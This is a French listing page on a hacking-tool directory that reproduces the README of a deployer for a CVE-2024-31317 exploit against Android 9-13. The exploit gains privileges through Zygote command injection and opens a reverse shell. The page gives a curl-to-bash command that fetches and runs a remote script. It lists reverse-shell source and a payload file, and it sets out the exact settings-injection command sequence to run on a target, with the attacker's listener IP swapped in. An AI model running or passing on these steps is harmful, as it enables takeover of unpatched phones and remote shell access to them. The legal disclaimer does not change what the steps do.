Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-31317-PoC-Deployer — Outil de déploiement automatisé pour le PoC CVE-2024-31317 sur Android 9-13, permettant l'élévation de privilèges via l'injection Zygote et l'exécution d'un reverse shell. | Kitploit
Outils/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
Sécurité AndroidEscalade de PrivilègesExploitationShellcodeTests d'IntrusionSécurité MobileDéveloppement de Charges UtilesExploitation de Binaires

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

Outil de déploiement automatisé pour le PoC CVE-2024-31317 sur Android 9-13, permettant l'élévation de privilèges via l'injection Zygote et l'exécution d'un reverse shell.

Voir le dépôt
52867il y a 1 anVérifié par Kitploit

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

Un outil de déploiement pour la preuve de concept de l'exploitation de CVE-2024-31317 ciblant les appareils Android 9 à 13.

📝 Description du projet

CVE-2024-31317-PoC-Deployer est un script de déploiement automatisé permettant de générer et configurer rapidement tous les fichiers nécessaires à l'exploitation de la vulnérabilité CVE-2024-31317. Cette vulnérabilité affecte les appareils Android 9 à 13 et permet une élévation de privilèges via le processus Zygote ainsi que l'exécution de code arbitraire.

🚨 Informations sur la vulnérabilité

  • CVE ID : CVE-2024-31317
  • Périmètre affecté : Android 9 à Android 13
  • Version corrigée : Android à partir du niveau de correctif de juin 2024
  • Type de vulnérabilité : Injection de commande dans le processus Zygote
  • Permission requise : WRITE_SECURE_SETTINGS

📦 Fichiers inclus

  • reverse_shell.c - Programme de shell inverse implémenté en C
  • payload.txt - Charge utile d'exploitation spécialement conçue
  • compile.sh - Script de compilation automatique
  • README.txt - Instructions d'utilisation détaillées
  • CVE-2024-31317.txt - Document d'analyse technique de la vulnérabilité

🛠️ Démarrage rapide

  1. Exécuter le script de déploiement à distance :

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. Compiler le shell inverse :

    root@kitploit:~
    sh compile.sh
    
  3. Lancer l'écouteur du shell inverse :

    root@kitploit:~
    sh reverse_shell
    

💣 Étapes d'exploitation

  1. Téléchargez payload.txt sur l'appareil cible dans /data/local/tmp/
  2. Remplacez xxx.xxx.xxx dans payload.txt par l'adresse IP de votre serveur d'écoute
  3. Exécutez la séquence de commandes suivante sur l'appareil cible :
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ Avertissement légal

Cet outil est destiné uniquement à des fins de tests de sécurité légitimes et de recherche. Une autorisation explicite du système cible est requise avant toute utilisation. Toute utilisation non autorisée peut enfreindre la loi. Le développeur décline toute responsabilité en cas d'usage abusif.

📜 Licence

Ce projet est sous licence MIT – voir le fichier LICENSE pour plus de détails.

📚 Références techniques

  • Bulletin de sécurité Android – juin 2024
  • Détails de CVE-2024-31317
Télécharger l’outil